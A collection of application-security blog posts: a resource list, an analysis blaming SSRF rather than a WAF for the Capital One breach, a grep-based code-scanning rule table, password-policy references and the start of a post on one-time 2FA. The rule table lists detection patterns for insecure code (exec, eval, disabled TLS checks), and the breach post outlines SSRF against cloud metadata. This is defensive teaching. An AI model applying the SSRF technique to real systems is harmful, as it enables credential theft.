Some Useful AppSec Resources

While no doubt OWASP has earned the prestige of being the #1 AppSec resource, there are many other good information sources across the web that I have collected over the years that have been very helpful to me and to others whom I have shared with.  I especially enjoy a blog that explains things simply and clearly while at the same time being technically correct.  Below is a list of my favourite such resources.  I am greatly appreciative to those who can reciprocate with their own list.

Blogs / General AppSec

Certificate Pinning

Cookie Security


Cross Site Scripting




Http Security Headers

Input Validation

  • Validating Input – This is old, but is a classic.  For more recent guidance, see the Martin Fowler website blog on The Basics of Web Application Security (linked above)



Mobile Security


  • An Illustrated Guide to OAuth and OpenID Connect – Most people want to dive into the technical details of Oauth before they really understand its purpose. Slow down, read this, and then you will have a better insight to the complex protocol



Race Conditions

Server Side Request Forgery


SQL Injection


Thoughts on the Capital One Security Breach

Whenever one reads about a security breach like what happened to Capital One, security experts are eager to find out the anatomy of the attack.  Little by little, details have emerged.  Initially called a firewall misconfiguration problem, later reports seemed to suggest a Server Side Request Forgery attack (SSRF) vulnerability.  These conflicting stories do not seem to be publicly resolved.  In fact, even a recent story from Wired is still suggesting firewall misconfiguration.  One thing that is clear is that Amazon is sticking to the firewall misconfiguration story while trying to remove themselves from any blame:

It’s inaccurate to argue that the Capital One breach was caused by IAM in any way. The intrusion was caused by a misconfiguration of a web application firewall and not the underlying cloud-based infrastructure

Which is it, firewall misconfiguration or SSRF, and if Amazon is not to blame, then who is?

Firewall Misconfiguration or SSRF?

It is not so common to hear of a web application being taken over due to a misconfigured firewall, so this sounded curious from the beginning.  The closest I have been able to find to make any sense of this comes from Krebs:

“According to a source with direct knowledge of the breach investigation, the problem stemmed in part from a misconfigured open-source Web Application Firewall (WAF) that Capital One was using as part of its operations hosted in the cloud with Amazon Web Services (AWS).

“Known as “ModSecurity,” this WAF is deployed along with the open-source Apache Web server to provide protections against several classes of vulnerabilities that attackers most commonly use to compromise the security of Web-based applications.

“The misconfiguration of the WAF allowed the intruder to trick the firewall into relaying requests to a key back-end resource on the AWS platform.”

Krebs then goes on to explain how the attacker performed SSRF on the web application to access the Amazon instance metadata, which allowed her to access IAM Role credentials and own the EC2 instance.

From this, we are actually starting to get some insight.  Indeed, the root cause of the problem does not seem to be a misconfigured firewall — instead it was an application SSRF vulnerability, which is a common theme for AWS hacks — in fact many tutorials about SSRF talk exactly about abusing AWS EC2 instances.

For those not familiar with SSRF, I strongly recommend this Contra Application Security tutorial that shows how Capital One might have been breached.  Assuming the accuracy, I must emphasize that it did not take a hacking genius to find this vulnerability.  This attack is low hanging fruit.

For Amazon and others to suggest that the problem was a misconfigured firewall shows a fundamental misunderstanding of web security.  Quite frankly, I find it shocking that one of the top cloud providers is is going with this line of argument, so time to speak out:

WAFs are not a magic solution to your security problems

What is evident from the above quotes is that a WAF configuration is being blamed for  web application vulnerability.  This is entirely the wrong security mindset.

When a web application is built, security has to be part of the design. It is not something that is added on at the end: “Now turn on your WAF, then you’re secure!”  Nonsense!  Sure, WAF vendors are there to sell a product, so they like to claim things that are stretching the truth.  But a company like Amazon should know better, and for them to point the finger at the WAF is very telling into the security immaturity of Amazon.

WAFs simply do not solve all security problems.  WAFs are a backup protection — if security protections were built into the application itself, then the WAF would offer no value.  In reality, developers make mistakes, so the WAF is a fallback security mechanism that can help when other things fail.  It is however by no means the primary form of defence.

WAF vendors need to be kept honest.  I’ve seen more than one make ridiculous claims: “Turn on your WAF and you are protected from the OWASP Top 10!”  It simply is not true.  WAFs can detect and stop a lot of common attacks, but there are so many things they cannot detect and/or stop.

WAFs work by searching for dangerous (“blacklist”) patterns and blocking requests that fit those patterns.  Blacklist validation can never be perfect, because there are an infinite number of possible inputs yet the blacklist must be finite.  Therefore it is just a matter of time before a good hacker finds the right pattern that gets past the WAF.

Moreover, there a number of strategies that hackers can use to bypass WAF blacklists, such as changing the encoding.  For good overviews, see WAF through the eyes of hackers and WAF Evasion Techniques.

Last, the suggestion that a WAF can stop all OWASP Top 10 issues (which some vendors will claim) is absurd particularly since some of the attacks on the list do not go through the server at all.  For example, DOM-based cross site scripting happens between the attacker and victim without going through the server or WAF.  The vulnerability is present due to servers serving up vulnerable JavaScript to the victim.  As another example, if the server is sending data via http rather than https, then any person can eavesdrop on it without sending any data to the server at all.  WAFs just cannot and do not sprinkle magic fairy dust to make these problems go away.

In the Capital One breach, Amazon is blaming Capital One for not having their WAF stop the SSRF.  The reality is that the WAF is the backup protection, and the primary protection should have been at the application level.  As I explained in my Understanding Input Validation blog from February 2018 (which by the way talks about how SSRF is often abused on Amazon cloud computing), input validation is the proper way to stop SSRF.  That solves the problem exactly where the vulnerability exists — in the code — rather than expecting some add-on security protection to suddenly turn an insecure application into a secure one.

So if it wasn’t a WAF misconfiguration, then whom do we blame?

The joy of recriminations!  In fact, I see a lot of failures which are far more significant than the WAF configuration failure.  For example:

  • Was the application penetration tested?  If not, that is a major failure in security process.  If it was, then it is a bit surprising to see that this vulnerability was missed — a good penetration tester should have found it.
  • Was the application security code reviewed?  A good code reviewer with a decent SAST tool could have found the vulnerability.  But we could only say that if we know whether Capital One invested in application security — that I do not know.
  • Were developers provided application security education?  While this is one that is harder to depend upon, it is a recommended best practice of today.
  • Maybe Amazon is to shoulder some blame for not making SSRF harder to abuse in their infrastructure?  I’ll elaborate on that in the next section.
  • Whoever made the business decision to go with AWS, was security part of that decision?  I’ll elaborate on that in the next section too.

AWS is like a car without seatbelts!

Recently, Evan Johnson from Cloudflare Inc wrote a blog Preventing the Capital One Breach.  That blog hits the nail on the head.

Let’s cut to the chase: The three biggest cloud providers are Amazon AWS, Microsoft Azure, and Google Cloud Platform (GCP).  All three have very dangerous instance metadata endpoints, yet Azure and GCP applications seem to never get hit by this dangerous SSRF vulnerability.  On the other hand, AWS applications continue to get hit over and over and over again.  Does that tell you something?

Microsoft is a company that learned about security the hard way.  It took them a long, time before they understood that it is their responsibility to make products that are secure by default and hard for the user to misuse:  Putting the responsibility for security in the hands of the user is dangerous.  A manifestation of this is in their instance metadata endpoint, which builds in protections to stop SSRF attacks:


I can’t say Google has learned security the hard way, instead I say they just hire a lot of smart people and their business clearly understands the importance of security to their business model.  Similar to Microsoft, they built SSRF defences into their instance metadata endpoint:


The point is that it is not sufficient for the attacker to be able to just control the url, but the attacker must also be able to set a http header in order to access the metadata endpoint.  In most cases, that is outside of the attacker’s control, which makes SSRF a lot less likely to exploit.

If Amazon had similar protections like Microsoft and Google, then it is unlikely that we would be talking about the Capital One security breach right now: it simply would not have happened.  So, why won’t Amazon put such protections in their metadata endpoint?  Because Amazon believes it is not their responsibility to make their services hard to abuse, instead it’s the customer’s responsibility to get everything perfect themselves.

And that’s where the seatbelt analogy comes in.  If these vendors were selling cars, the Microsofts and Googles would be selling the cars with seatbelts — understanding that you might crash, but they have designed the systems to reduce the impact to you.  Amazon on the other hand would be the vendor selling the car without seatbelts: if you crash, it’s your own fault.  If you die, don’t blame them.  They provided a car with a lot of nice features and if you read the manual and drove it exactly as you are expected to, you would have no problems.  But let’s be clear, if everything is not perfect, then you accept the consequences and they will let you know it’s your fault and not theirs.  See it in their own words:

“The intrusion was caused by a misconfiguration of a web application firewall and not the underlying infrastructure or the location of the infrastructure.  AWS is constantly delivering services and functionality to anticipate new threats at scale, offering more security capabilities and layers than customers can find anywhere else including within their own datacenters, and when broadly used, properly configured and monitored, offer unmatched security—and the track record for customers over 13+ years in securely using AWS provides unambiguous proof that these layers work.”

Concluding remarks

Amazon lacks security maturity.  They do not understand key concepts that those weathered in the industry have learned over many years of experience.  Trying to suggest a firewall is the fix for an application security problem is fundamentally wrong.  Relying on people to be experts at configuring firewalls to prevent attacks is a bad strategy: instead they should learn from the Microsofts and Googles about how to build infrastructure that is less fragile and less dependent upon the perfect users.  That’s not to say that the other security controls do not have a place, but instead they need to understand that they are backup defences and not primary defences.

Hosting in AWS is like buying a car without seatbelts.  If your application gets hit as well, then maybe the stakeholders who pushed for AWS should shoulder the vast majority of the blame.  Next time security should be part of the decision making when choosing a cloud provider, which means both Azure and GCP should be preferred over AWS.


Don’t Underestimate Grep Based Code Scanning

Static analysis tools (SAST) are perhaps the most common tool for an AppSec team in the endless effort to move security to the left. They can be integrated into development pipelines in order to offer quick feedback to the developer to catch security bugs, resulting in faster remediation times and improved return on investment for developing secure software.

The SAST market is dominated by a small number of big players that charge high licencing fees for tools that do sophisticated analysis. One of the main features of such tools is the data flow analysis, which traces vulnerabilities from source to sink, potentially going across a number of files. More information about what such tools can do can be found in this Synopsis report.  These tools typically can take hours or even days to complete a scan, and may use a large amount of memory. Furthermore, some of the tools have a large number of false positives, and potentially their own eccentricities. For organisations with deep pockets, the benefits outweigh the costs.

There are lower cost, more efficient SAST tools, but they typically do lack the sophistication in terms of quality of security bug findings. Perhaps the most popular low-cost alternative is SonarQube, which is quite popular amont developers. SonarQube does very quick scans, but lacks the data flow analysis capability that the more expensive tools have. As a consequence, security findings are represented in one place (not source-to-sink analysis).

In this blog, we’re going to talk about grep-based code scanning, which is an old fashioned way of SAST scanning — but we argue that good grep based scanning can do reasonably well compared to expensive SAST tools in terms of quality of bugs found. While grep based-scanning in the form we present it cannot do data flow analysis, we claim that the major shortcomings in what we miss are not extensive. We also show examples of things we found that our commercial tool at the time missed. While it is certainly capable that the commercial tools can build up their rule sets to catch everything we catch, it falls upon them to add those rules.

I have experience we three leading SAST tools, but considerable experience with only one of them. I’m not going to call out any names of tools, but I do generally see room for improvement in them.

In order to make this blog the most beneficial to the readers, we will provide a starting pack of grep-based rule sets that we have used. The tools we have developed are not in a state that they can be open sourced, and we do not have the time to fix them up. However, the rules we provide open the door for somebody with that time availability to do so. It takes very little effort to build a PoC in this way.

This is joint work with Jack Healy.

Tool philosophy

False positives seem part of the game in the SAST market. While I have heard of one tool trying to put considerable focus into removing false positives, I have not experienced such features in the tools that I have worked with — at least not “out of the box.” As a consequence, many tools seem to require manual inspection of the findings to remove the junk and focus on the issues that seem real. In our grep-based scanner, we play by the same rules: we assume that the results are going to be inspected manually, and the person running the tool has a basic understanding of security vulnerabilities and how to identify them in code. Thus, grep-based code scanning assumes a certain level of security competence and language expertise by the person running the code scan.

We take the philosophy that is okay to have a large number of false positives if we are looking at something that is very serious and too often a problem — for example, SQL injection. We take the philosophy that it is not okay to have a lot of false positives if the issues is not that serious (by CVSS rating). Generally, we are not trying to find everything, but instead trying to maximise the value we get out of our code scanning under a manual inspection time constraint. It’s worth spending extra time for catching the big fish, not for the small ones.

Depending upon how the tool is used, we may under some conditions want to report only things that are high confidence, and ignore everything else. A common example is in a CICD environment, where you want to break a build only if you are quite confident that something is wrong. So in our case, we have an option to only report very high confidence results. We also allow developers to flag false positives similar to how SonarQube does it, thus making it developer friendly.

What do we lose by not having data flow analysis?

While the expensive tools have the advantage of data flow analysis, our belief is that we can get a lot of what they get without it. The biggest exception is cross-site scripting, which our grep-based scanner does not find. We consider alternative tooling such as DAST to be an option for finding this serious issue.

Another example of an important issue that we are unlikely to find is logging of sensitive information. Typically that does require some type of data flow analysis — you’re almost never going to find code that directly does something direct like Log(password).

But something like SQL injection, we have found a number of times. The reason being — we report every SQL query we find. Yes, it’s noisy, but it takes a code reviewer at most 10 seconds of manual inspection time to see if there is a string concatenation in the query, and if that’s the case, it may be vulnerable. If not, the reviewer can quickly dismiss it as a false positive. Obviously more sophisticated code scanning can make this less noisy (example: regular expression code scanning), but this is our starting point.

Certainly tools with data flow analysis are more efficient for something important like SQL injection. However the benefit from that efficiency is often lost when weighed against how much manual time is lost on false positives for issues that are not that important and/or low confidence. Furthermore, some tools do not do so well in terms of rating the seriousness of a vulnerability: they can be over-zealous in calling too many issues critical or high risk (though this may be configurable). Because of this, the overall usage of our tool — at least for us — seems to require similar manual effort as some of the popular commercial tools despite the simplicity of the design.

Examples of things we found that our main commercial tool missed

Because of the simplicity of our design and because we assume that a competent reviewer is going to look a the code, we were able to put in rules that help the reviewer find things that big commercial tools tend to miss.

One very fruitful area in finding security bugs is bad crypto. As mentioned in Top 10 Developer Crypto Mistakes, bad crypto is more prevalent than good crypto. Part of the reason for this is bad crypto APIs. Another part of the reason is that the tools don’t help developers catch mistakes. Vendors of these tools could find a lot more problems if they were to listen to cryptographers. Our tool flags any use of “crypt” and any other key words that are indicative of bad cryptography, such as rc4, arcfour, md5, sha1, TripleDES, etc…. We go into more details about crypto bugs in the rules sets.

Another issue that we find surprisingly often that our main commercial tool missed was http://. Of course it should always be https://. Similarly one can look for ftp:// and other insecure protocols.

There are also a number of dangerous functions that we flag, and often these open up discussions about coding practices. For example, the Angluar trustAsHtml or React dangerouslySetInnerHTML. In our case, we had to educate the developers on the right approach to handle untrusted data, because they thought it was safe to sanitise data prior to putting in the database and then use trustAsHtml upon display. We did not agree with this coding style and worked to change it.

One thing that we like to always look at is MVC controller functionality because sometimes that’s where input validation should be applied (in other times you might do it in the model). We often find a lack of input validation, which does not necessarily imply a vulnerability but does show the need for improved defensive programming. Even more interesting, one time when we looked at a controller, we found that it was obviously not doing access control checking that it should be doing, and this was one of the most major findings that we caught. Normally access control problems are not something you would find with a SAST tool, but our differing approach to how to use the tool made it work for us.

Sample rules: starter pack

Rules can go on forever, so here I want to just focus on some of the more fruitful ones to get you started. Generally we do a case insensitive grep to find the key word, and then we grep out (“grep -v”) things that got in by chance but are not actually the key word we are looking for. We call these “exceptions” to our rules.  For example “3des” is indicative of the insecure triple DES encryption algorithm, but we wouldn’t want to pull in a variable like “S3Destination”, which our developers might use for Amazon S3 storage (nothing to do with triple DES). We learn the exceptions over time.

A very common grep rule that we need to make exceptions for is “http:”.  While we are looking for insecure transport layer communications, the problem is that “http:” is also used in XML namespaces that have nothing to do with transport layer security.  This means we have to grep out things like “xmlns”.  Also, writing logic to ignore commented code helps a lot — otherwise you will pull in many false positives like license example ( or stackoverflow links, which often occur in comments.

It may look like we omitted some obvious rules in some cases, but sometimes there are subtle reasons. For example, even though we do a lot of crypto rules, we don’t do an “ECB” (insecure electronic code book mode of operation) search simply because it is too noisy. Those characters “E”, “C”, and “B” all look like hexadecimal numbers, and we often got false positives from hexadecimal values in code. It was deemed not fruitful enough to keep such a rule (as explained in our design philosophy above).

We also try to group our rule by language to reduce false positives. However some rules apply to all languages. In our case we are primarily working on web software so we don’t specify languages like C/C++, etc…

Below is the starter pack of rules. Some rules are clearly more noisy than others — people can pick and choose the ones they want to focus on.

Grep string Look for Languages
password, passwd, credential, passphrase Hardcoded passwords, insecure password storage, insecure password transmission, password policy, etc…. all
sql, query( sql injection (string concatenation) all
strcat, strcpy, strncat, strncpy, sprintf, gets dangerous C functions used in iOS iOS
setAllowsAnyHTTPSCertificate, validatesSecureCertificate, allowInvalidCertificates, kCFStreamSSLValidatesCertificateChain disables TLS cert checking iOS
crypt hardcoded keys, fixed IVs, confusing encryption with message integrity, hardcoded salts, crypto soup, insecure mode of operation for symmetric cipher, misuse of a hash function, confusing a password with a crypto key, insecure randomness, key size too small.  See Top 10 Developer Crypto Mistakes all
CCCrypt IV is not optional (Apple API documentation is wrong) if security is required iOS
md5, sha1, sha-1 insecure, deprecate hash function all
3des, des3, TripleDES insecure deprecate encryption function all
debuggable do not ship debugabble code android
WRITE_EXTERNAL_STORAGE, sdcard, getExternalStorageDirectory, isExternalStorageWritable check that sensitive data is not being written to insecure storage android
MODE_WORLD_READABLE, MODE_WORLD_WRITEABLE should never make files world readable or writeable android
SSLSocketFactory dangerous functionality — insecure API, easy to make mistakes java
SecretKeySpec verify that crypto keys are not hardcoded java
PBEParameterSpec verify salt is not hardcoded and iterations is at least 10,000 c#
PasswordDeriveBytes insecure password based key derivation function (PBKDF1) c#
rc4, arcfour deprecated, insecure stream cipher all
exec( remote code execution if user input is sent in java
eval( remote code execution if user input is sent in javascript
http: insecure transport layer security, need https: all
ftp: insecure file transfer, need ftps: all
ALLOW_ALL_HOSTNAME_VERIFIER, AllowAllHostnameVerifier certificate checking disabled java
printStackTrace should not output stack traces (information disclosure) java, jsp
readObject( potential deserialization vulnerability if input is untrusted java
dangerouslySetInnerHTML dangerous React functionality (XSS) javascript
trustAsHtml dangerous Angular functionality


Math.random( not cryptographically secure javascript
java.util.Random not cryptographically secure java
SAXParserFactory, DOM4J, XMLInputFactory, TransformerFactory, javax.xml.validation.Validator, SchemaFactory, SAXTransformerFactory, XMLReader SAXBuilder, SAXReader, javax.xml.bind.Unmarshaller, XPathExpression DOMSource, StAXSource vulnerable to XXE by default java
controller MVC controller functionality: check for input validation c#, java
HttpServletRequest check for input validation java
request.getParameter check for input validation jsp
exec dynamic sql: potential for sql injection sql
getAcceptedIssuers If null is returned, then TLS host name verification is disabled android
isTrusted If returns true, then TLS validation is disabled java
trustmanager could be used to skip cert checking java
ServerCertificateValidationCallback If returns true, then TLS validation is disabled c#
checkCertificateName If set to false, then hostname verification is disabled c#
checkCertificateRevocationList If set to false, then CRLS not checked c#
NODE_TLS_REJECT_UNAUTHORIZED certificate checking is disabled javascript
rejectUnauthorized, insecure, strictSSL, clientPemCrtSignedBySelfSignedRootCaBuffer cert checking may be disabled javascript
NSExceptionDomains, NSAllowsArbitraryLoads, NSExceptionAllowsInsecureHTTPLoads allows http instead of https traffic iOS
kSSLProtocol3, kSSLProtocol2, kSSLProtocolAll, NSExceptionMinimumTLSVersion allows insecure SSL communications iOS
public-read publicly readable Amazon S3 bucket — make sure no confidential data stored all
AWS_KEY look for hardcoded AWS keys all
urllib3.disable_warnings certificate checking may be disabled python
ssl_version can be used to allow insecure SSL comms python
cookie make sure cookies set secure and httpOnly attributes all
kSecAttrAccessibleAlways insecure keychain access iOS

Collection of References on Why Password Policies Need to Change

Organisations like NIST and the UK National Cyber Security Centre (NCSC) are pushing password security policies that are much different from the past. Most notably, password expiry and character composition rules are being dropped, and replaced by other more user friendly recommendations.  Despite their efforts, many organisations are very slow in changing to the modern guidance, and instead remain with password policy practices that are characteristic of 2004 guidance. If you’d like to work towards change in your organisation, it helps to have a useful set of references to pass on to those who write the policies.

Is it worth trying to make the change? In my judgement, an important part of building a positive security culture is considering pain versus value in every decision you make. A lot of historical guidance for password security is high pain and little to no security value according to what we have learned, and sometimes causes more harm than good in ways that policy makers never anticipated. We also must remember that availability is one of the three pillars of security: when users get locked out of their account for reasons that can at least partially be attributed to password security policies, then we are not putting the best face of security forward.  This is especially true when there are better ways to do things:  Security policy writers need to keep their knowledge up to date.

This blog contains a information from various sources including research papers, reports/white papers, popular blogs, government websites, and news organisations. Dates of publications are included so readers can keep in mind that more recent publications are based upon more recent knowledge. While there are many existing blogs on password security, the main contributions here are:

  1. Assembling a large number of modern sources together,
  2. Providing compact summaries of why the sources are relevant to the purpose of making password policy change within an organisation,
  3. Including research publications that show where new recommendations are derived from (thus going beyond “appeal to authority” arguments — the research is there for anybody who cares to check it themselves).

Overview of modern password security guidance

  • (WSJ news article – requires subscription, 2017) The Man Who Wrote Those Password Rules Has a New Tip: N3v$r M1^d!. This article talks about how the author of the classic NIST document that proposed composition rules and similar guidance (from NIST Special Publication 800-63 Appendix A) now rejects those recommendations. Those recommendations seemed to be okay back then, but by what we have learned today, they no longer serve the original intent. New recommendations are written that balance security with usability needs.
  • (Naked Security news article, 2016) NIST’s new password rules – what you need to know. This is a compact summary of the changes to NIST’s password security guidance. Because the article is short, it is a good way to open up the conversation with people who have limited time or attention span. It tells what policy makers need to change to be in compliance with NIST guidelines.
  • (Troy Hunt blog, 2017) Passwords Evolved: Authentication Guidance for the Modern Era. This is quite a long, but very well written article about the changes to NIST’s password guidance and why the changes are being made. It also draws from the UK government’s guidance and Microsoft’s guidance to strengthen the argument. The section on “Listen to Your Governments (and Smart Tech Companies)” makes a great appeal to authority argument on why companies should take these recommendations seriously. Overall, it is a good read for those who have time and interest to read it.

The new recommendations — original sources

  • (NIST publication, 2017) NIST Special Publication 800-63B. This is right from the horse’s mouth, but it’s not a document to start the conversation with because the document is large and uses terminology that will take time for many readers to interpret. It is nevertheless the proof you will need if people question whether NIST is really making such a recommendation. For example, the requirement not to expire have composition rules for passwords (“memorized secrets”) is given in section 10.2.1. That section also says these secrets should not be required to change periodically. The requirement to not allow hints to recover passwords is given in section The requirement to not allow secret questions for account recovery is better found in NIST’s FAQ.
  • (NIST web page FAQ, 2019) NIST Special Publication 800-63: Digital Identity Guidelines Frequently Asked Questions. This is an easier place to start than the NIST original publication, as it is more human readable. It gets right to the point on questions like why composition rules are no longer recommended, why password expiry is no longer recommended, and why secret questions for account recovery are no longer permitted.
  • (NCSC publication, 2018) Password administration for system owners. These recommendations are similar in nature to the NIST recommendations. See sections on “Don’t enforce regular password expiry” and “Do not use complexity requirements”. But additionally worth pointing out is “Reduce your organisation’s reliance on passwords” (we have too many passwords already) and “Implement technical solutions”, which includes other ways guidance on helping protect user passwords while not locking users out of their accounts long-term.
  • (NCSC infographic, 2018) NCSC Password Policy Advice for system owners. A simple graphic that shows the risks and how to help improve password security within an organisation. The right half in purple gives password policy recommendations (unfortunately, while most of the infographic is good, there is one serious blunder in it where it recommends SHA-256 for password hashing. SHA256 was not designed for this type operation. Those who know the cryptography understand this, those who don’t can get the understanding from an old Troy Hunt article).
  • (NCSC blog, 2016) The problems with forcing regular password expiry.  A simple blog that explains why password expiry causes more harm than good. In short, users choose similar passwords to previous passwords and minimally meet the complexity requirement to try create a password they can memorise. There is also an increased tendency of forgotten passwords, that causes a productivity cost to an organisation.
  • (Microsoft publication, 2016) Microsoft Password Guidance. This report is great, because it is easy to read and gets right to the point. On the first page it enumerates 7 recommendations to system administrators which include things not to do (do not enforce password expiry or composition rules) and what to do (8 character minimum password, ban common passwords, etc…). Further in the document it goes into more details and includes references to research reports that justify why the changes are being made. Overall, the clarity, simplicity, and completeness (especially research references) of this publication make it a top source for referencing to others. However, because it predates the NIST and NCSC changes, it lacks the references to NIST’s new guidelines. It also lacks details on how organisations can implement the risk based multi factor authentication that it recommends.

Research on why password policies need to change

  • (Research paper, 2010) The Security of Modern Password Expiration: An Algorithmic Framework and Empirical Analysis. The main goal of password expiry is limiting the amount of time an attacker has access to an account in the event of password compromise. This paper questions whether that goal is met by analysing a dataset of 7700 accounts to determine whether knowing one password allowed recovering other passwords for that user. The fallacy around password expiry recommendations is that security administrators assume users choose each password randomly and independently from other passwords, but the reality is that the vast majority of users don’t . The paper shows even for websites where users have an incentive in protecting their accounts (for example, it holds payroll data), new user passwords tend to be strongly related to previous ones. The study found that could derive 17% of new passwords within 5 guesses and 41% of new passwords within seconds in an offline attack with little effort. The authors write:

    “Combined with the annoyance that expiration causes users, our evidence suggests it may be appropriate to do away with password expiration altogether, perhaps as a concession while requiring users to invest the effort to select a significantly stronger password than they would otherwise (e.g., a much longer passphrase).”

  • (Research paper, 2010) Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords.  When NIST wrote their 2004 Special Publication 800-63 that had the recommendations for password policy, they included entropy estimates on how strong the passwords complying to the policy would be. This research does password cracking on sets of real user data to prove that those estimates are far too high. Part of the reason for this is that users tend to follow similar patterns when forced to comply with a password policy. For example, when required to use digits, users tend to either choose all digits or else put the digits at the end of the password (nearly 85%); When required to use an upper case letter, users tend to use either all upper case or put only the first letter as upper case (89%); and when required to use a special character users tend to put it at the end of the password (28.5%). An attacker can use known human behaviour to increase his chances of success for password cracking attacks. The paper notes that using a password blacklist of 50,000 passwords helps significantly, but not as much as NIST predicted. The authors conclude

    Our findings were that … most common password creation policies remains vulnerable to online attack. This is due to a subset of the users picking easy to guess passwords that still comply with the password creation policy in place, for example “Password!1”

  • (Research paper, 1999) Users are not the Enemy.  This paper surveys a large number of users to understand the problems they have with password security. While it is true that many users do not assume the responsibility they should for protecting their accounts, the study also finds that part of the problem is the difficulty users have with complying with password security policies. Users have a large number of passwords that need to change regularly and each having different password complexity requirements, which makes it much more likely that users will do things that they should not do just so they do not lose access to their accounts. The section on Security needs user-centered design notes that

    Many of these [security] mechanisms create overheads for users, or require unworkable user behavior. It is therefore hardly surprising to find, that many users try to circumvent such mechanisms.”

    The paper concludes with a set of recommendations to help users with passwords. However, this paper is old (from 1999) so therefore the recommendations are also subject to the knowledge of the time.

  • (Research paper, 2010) The True Cost of Unusable Password Policies: Password Use in the Wild.  The authors note that users are generally cogent in their understanding of security needs, but found compliance to passwords policies too difficult. To cope with security demands, users developed their own strategies, which end up introducing their own problems. As a consequence, the complexity of complying with security policies results in an adverse effect on the security posture of the organisations. For example, one user dealt with a policy that forced him to change his password in a way that it was not similar to any 12 of his previous passwords by just writing down the password so he would not forget it. In the section on Towards Holistic Password Policies, the authors note that just looking at the technical side and ignoring the user side, does not encourage security awareness — instead it introduces problems that antagonise users. Instead, password policies need to be design for the context in which users use the systems for, with an emphasis on eliminating the risks that they are likely to face in that context.
  • (Research paper, 2007) Do Strong Web Passwords Accomplish Anything?. There are many ways that an attacker may go after a user, and password policies only address defence against brute forcing attacks. They do not address phishing, key logging, shoulder surfing, insecure password storage on local machines, and guessing based upon special knowledge about the user. Although strong passwords do help in some cases, there are other more user-friendly security controls that could be put in place of the complex password policy. These other controls make strong password policies less important. The paper argues

    Since the cost is borne by the user, but the benefit is enjoyed by the bank user resistance to stronger passwords is predictable. We argue that there are better means of addressing brute-force bulk guessing attacks.

    However this paper is from 2007. See next item which is related but more recent:

  • (Blog, 2019) Your Pa$$word doesn’t matter.  This blog unfortunately has a misleading title that caused many readers to misjudge it before reading it. It is not telling users not to choose strong passwords, but instead is saying that password complexity policies have little benefit when considering the various ways that passwords are attacked. In spirit it is similar to the previous item, but this research is more modern. It tells system administrators and security policy writers:

    “Focusing on password rules, rather than things that can really help – like multi-factor authentication (MFA), or great threat detection – is just a distraction.”

  • (Research paper, 2015) Quantifying the Security Advantage of Password Expiration Policies. The abstract gets right to the point:

    “Many security policies force users to change passwords within fixed intervals, with the apparent justification that this improves overall security. However, the implied security benefit has never been explicitly quantified. In this note, we quantify the security advantage of a password expiration policy, finding that the optimal benefit is relatively minor at best, and questionable in light of overall costs.”

    This paper does a mathematical analysis on the benefit of password expiry policies. Without considering the possibility of new passwords being related to old, this paper instead considers an attacker who keeps trying to guess the user password in an online attack even after the password might have changed without the attackers knowledge of that change happening. In essence, they show that the attacker’s chance of success is not largely different than if there was no password expiry policy in place. And this is even if the password is chosen randomly (most users don’t do this complexity, which makes attacks easier). The authors conclude by challenging those who favour such policies to explain why and in which specific circumstances a substantiating benefit is evident.

  • (Research paper, 2009) It’s no secret : Measuring the security and reliability of authentication via ‘secret’ questions.  Historically, requiring users to provide answers to secret questions upon registration was a way to do account recovery in the event of forgotten password. This paper analyses these practices and finds that 20% of users forget their own answers to secret questions within 6 months, acquaintances of such people can guess answers to their secret questions 17% of the time, and 13% of the time an answer could be guessed by an attacker within 5 attempts by trying the most popular answers. The authors conclude that these questions are neither reliable nor do they meet security requirements. They propose a number of options to improve secret questions or have alternative backup authenticators, but ultimately this paper more than any other lead to the removal of secret questions for account recovery.

Other references

  • (Microsoft blog, 2019) Security baseline (FINAL) for Windows 10 v1903 and Windows Server v1903.  Periodic password expiration will no longer be enabled in Windows 10 and Windows Server. The blog writes

    “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance. At the same time, we must reiterate that we strongly recommend additional protections even though they cannot be expressed in our baselines.”

  • (FTC blog, 2016) Time to rethink mandatory password changes.  This is from a former Chief Technologist of the US Federal Trade Commission. The author explains why requiring users to change their passwords does more harm than good, and includes a long list of references like many included here to back up the argument. While there may be reasons for you to change your password (examples given), requiring regular changes in a password policy is not necessarily good practice:

    Research suggests frequent mandatory expiration inconveniences and annoys users without as much security benefit as previously thought, and may even cause some users to behave less securely. Encouraging users to make the effort to create a strong password that they will be able to use for a long time may be a better approach for many organizations…

Concluding remarks

The shortcomings of legacy password policies are well documented, however there are two distinct philosophies for moving forward.  On one hand, there remains the “fix the user” philosophy which pushes education and password managers as the main mechanisms for protecting user accounts.  The alternate approach is to design systems that are less reliant upon passwords as the sole determinant for authentication, which is the approach that Google and Microsoft seem to be taking (related: see Protecting User Accounts When Usability Matters).  I honestly believe that both philosophies have a place going forward.  The problem today is that there is way too much emphasis on the former and not enough effort being put into the latter.  We can’t always count on people to do the right thing, but there are often things we can do to protect their backs when they are negligent.  Putting security complexity burden on the user should be the last fallback option, not the default option.

Protecting User Accounts When Usability Matters

Scenario: Password guessing attacks are happening on your website. The attacker is performing password spraying: he tries a single password for a user, and if it fails, he moves on to the next user. The attacker is also changing his IP address, including the use of IP addresses that are geolocated where many legitimate users come from.

Because of the attacker’s tactics, blocking IP addresses and account lockouts won’t work. You also work for a business that is very sensitive to security controls that impact usability. Captchas, two-factor authentication, and stronger password security policies are rejected by the business.

What can you do?

This blog is about a security control that largely prevents these type of password guessing attacks at minimal usability impact. We call it One-Time Two Factor Authentication (OT2FA). It’s a simple idea derived from a number of sources, including:

Revisiting Defenses Against Large-Scale Online Password Guessing Attacks by Mansour Alsaleh, Mohammad Mannan, and P.C. van Oorschot.
Securing Passwords Against Dictionary Attacks by Benny Pinkas and Tomas Sander.
Enhanced Authentication In Online Banking by Gregory D. Williamson.

OT2FA should not be considered new, as it has strong similarities to what companies like Google and Lastpass are doing (though their implementation details are unpublished). However too many websites are doing alternatives that are both less secure and less user friendly.

One-Time Two Factor Authentication

Two-factor authentication (2FA) is an effective security control for preventing password guessing attacks, but it comes at a large usability impact: users don’t like be challenged for a one-time secret code every time they login. Businesses that are trying to acquire new users to win market share are averse to security controls that annoy users.

But what if one could get close to the security of 2FA with little usability impact? This is what OT2FA aims to accomplish.

